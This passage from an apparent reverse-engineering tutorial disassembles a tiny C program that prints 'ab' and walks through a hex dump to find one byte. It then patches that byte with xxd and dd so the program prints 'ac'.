    10e4:       80 3d 2d 2f 00 00 00    cmpb   $0x0,0x2f2d(%rip)        # 4018 <__TMC_END__>
    10eb:       75 33                   jne    1120 <_start+0xe0>
    10ed:       55                      push   %rbp
    10ee:       48 83 3d ea 2e 00 00    cmpq   $0x0,0x2eea(%rip)        # 3fe0 <__cxa_finalize@GLIBC_2.2.5>
    10f5:       00
    10f6:       48 89 e5                mov    %rsp,%rbp
    10f9:       74 0d                   je     1108 <_start+0xc8>
    10fb:       48 8b 3d 0e 2f 00 00    mov    0x2f0e(%rip),%rdi        # 4010 <__dso_handle>
    1102:       ff 15 d8 2e 00 00       call   *0x2ed8(%rip)        # 3fe0 <__cxa_finalize@GLIBC_2.2.5>
    1108:       e8 63 ff ff ff          call   1070 <_start+0x30>
    110d:       c6 05 04 2f 00 00 01    movb   $0x1,0x2f04(%rip)        # 4018 <__TMC_END__>
    1114:       5d                      pop    %rbp
    1115:       c3                      ret
    1116:       66 2e 0f 1f 84 00 00    cs nopw 0x0(%rax,%rax,1)
    111d:       00 00 00
    1120:       c3                      ret
    1121:       0f 1f 40 00             nopl   0x0(%rax)
    1125:       66 66 2e 0f 1f 84 00    data16 cs nopw 0x0(%rax,%rax,1)
    112c:       00 00 00 00
    1130:       f3 0f 1e fa             endbr64
    1134:       e9 67 ff ff ff          jmp    10a0 <_start+0x60>

0000000000001139 <main>:
    1139:       55                      push   %rbp
    113a:       48 89 e5                mov    %rsp,%rbp
    113d:       bf 61 00 00 00          mov    $0x61,%edi
    1142:       e8 e9 fe ff ff          call   1030 <putchar@plt>
    1147:       bf 62 00 00 00          mov    $0x62,%edi
    114c:       e8 df fe ff ff          call   1030 <putchar@plt>
    1151:       bf 0a 00 00 00          mov    $0xa,%edi
    1156:       e8 d5 fe ff ff          call   1030 <putchar@plt>
    115b:       b8 00 00 00 00          mov    $0x0,%eax
    1160:       5d                      pop    %rbp
    1161:       c3                      ret

Disassembly of section .fini:

0000000000001164 <_fini>:
    1164:       f3 0f 1e fa             endbr64
    1168:       48 83 ec 08             sub    $0x8,%rsp
    116c:       48 83 c4 08             add    $0x8,%rsp
    1170:       c3                      ret

That’s a lot of code! The part we’re interested in is the main function starting at address 0x1139. We can focus this a bit by telling objdump to only dump the specific symbol we’re interested in (main). We also pass the -f flag to get some additional information about the file:

λ workspace $ objdump --disassemble=main -f main

main:     file format elf64-x86-64
architecture: i386:x86-64, flags 0x00000150:
HAS_SYMS, DYNAMIC, D_PAGED
start address 0x0000000000001040


Disassembly of section .init:

Disassembly of section .plt:

Disassembly of section .text:

0000000000001139 <main>:
    1139:       55                      push   %rbp
    113a:       48 89 e5                mov    %rsp,%rbp
    113d:       bf 61 00 00 00          mov    $0x61,%edi
    1142:       e8 e9 fe ff ff          call   1030 <putchar@plt>
    1147:       bf 62 00 00 00          mov    $0x62,%edi
    114c:       e8 df fe ff ff          call   1030 <putchar@plt>
    1151:       bf 0a 00 00 00          mov    $0xa,%edi
    1156:       e8 d5 fe ff ff          call   1030 <putchar@plt>
    115b:       b8 00 00 00 00          mov    $0x0,%eax
    1160:       5d                      pop    %rbp
    1161:       c3                      ret

Disassembly of section .fini:

The instruction at address 0x1142 is responsible for printing the character ‘a’ (ASCII 0x61). The instruction prior to that puts the value 0x61 (hex for ‘a’) into the edi register, which is used as an argument to the putchar function. So, we first load the character ‘a’ into edi, then call putchar. putchar looks at edi, sees the value 0x61, and prints ‘a’.

The same pattern repeats for the next two characters: at address 0x1147 we load 0x62 (hex for ‘b’) into edi, and at address 0x1151 we load 0x0a (hex for a newline) into edi, each followed by a call to putchar.

So, if we wanted to change the program to print “ac” instead of “ab”, we would need to change the instruction at address 0x1147 to load 0x63 (hex for ‘c’) into edi instead of 0x62. Simple.

To get at the raw bytes, we can produce a hex dump of the executable with xxd:


λ workspace $ xxd main > main.asm
λ workspace $ cat main.asm

The dump is rather lengthy, so I'll only print out the relevant portion
.... redacted ....

00001050: f050 5445 31c0 31c9 488d 3dda 0000 00ff  .PTE1.1.H.=.....
00001060: 155b 2f00 00f4 662e 0f1f 8400 0000 0000  .[/...f.........
00001070: 488d 3da1 2f00 0048 8d05 9a2f 0000 4839  H.=./..H.../..H9
00001080: f874 1548 8b05 3e2f 0000 4885 c074 09ff  .t.H..>/..H..t..
00001090: e00f 1f80 0000 0000 c30f 1f80 0000 0000  ................
000010a0: 488d 3d71 2f00 0048 8d35 6a2f 0000 4829  H.=q/..H.5j/..H)
000010b0: fe48 89f0 48c1 ee3f 48c1 f803 4801 c648  .H..H..?H...H..H
000010c0: d1fe 7414 488b 050d 2f00 0048 85c0 7408  ..t.H.../..H..t.
000010d0: ffe0 660f 1f44 0000 c30f 1f80 0000 0000  ..f..D..........
000010e0: f30f 1efa 803d 2d2f 0000 0075 3355 4883  .....=-/...u3UH.
000010f0: 3dea 2e00 0000 4889 e574 0d48 8b3d 0e2f  =.....H..t.H.=./
00001100: 0000 ff15 d82e 0000 e863 ffff ffc6 0504  .........c......
00001110: 2f00 0001 5dc3 662e 0f1f 8400 0000 0000  /...].f.........
00001120: c30f 1f40 0066 662e 0f1f 8400 0000 0000  ...@.ff.........
00001130: f30f 1efa e967 ffff ff55 4889 e5bf 6100  .....g...UH...a.
00001140: 0000 e8e9 feff ffbf 6200 0000 e8df feff  ........b....... < HERE
00001150: ffbf 0a00 0000 e8d5 feff ffb8 0000 0000  ................
00001160: 5dc3 0000 f30f 1efa 4883 ec08 4883 c408  ].......H...H...
00001170: c300 0000 0000 0000 0000 0000 0000 0000  ................
00001180: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001190: 0000 0000 0000 0000 0000 0000 0000 0000  ................

.... redacted ....

In the above hex dump, each line starts with a file offset (e.g., 00001050), followed by the hex representation of the bytes, and finally the ASCII representation on the right. For this binary the file offsets match the virtual addresses in the disassembly, so the instruction at address 0x1147 (bf 62 00 00 00) begins at file offset 0x1147, which is the 8th byte of the line starting at offset 00001140 (0x1147 - 0x1140 = 7). The immediate value 0x62 that we want to modify is the byte right after the bf opcode, at offset 0x1148. I have marked the line with < HERE in the above dump. To make the instruction load 0x63 instead of 0x62, we change the byte 62 to 63.

This is the line we’re interested in:

00001140: 0000 e8e9 feff ffbf 6200 0000 e8df feff  ........b....... < HERE

And this is what we want to change it to:

00001140: 0000 e8e9 feff ffbf 6300 0000 e8df feff  ........c....... < Notice the 63 (0x63, i.e. 'c')

To do this, we can open the hex dump in a text editor, make the change, and then write it back to a binary file using xxd:

λ workspace $ xxd -r main.asm modified_main

We can then run the modified executable to see the results:

λ workspace $ ./modified_main
ac

As you can see, the program now prints “ac” instead of “ab”. By modifying the machine code directly, we were able to change the behavior of the program without recompiling the source code.
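As a side note, the same one-byte patch can be made without hand-editing the hex dump by writing directly at the byte’s file offset with dd. This is a sketch that assumes the file offset of the immediate operand equals its virtual address (0x1148), which happens to hold for this binary; the copy’s name is arbitrary:

cp main patched_main                                              # work on a copy
printf '\x63' | dd of=patched_main bs=1 seek=$((0x1148)) conv=notrunc
./patched_main                                                    # prints "ac"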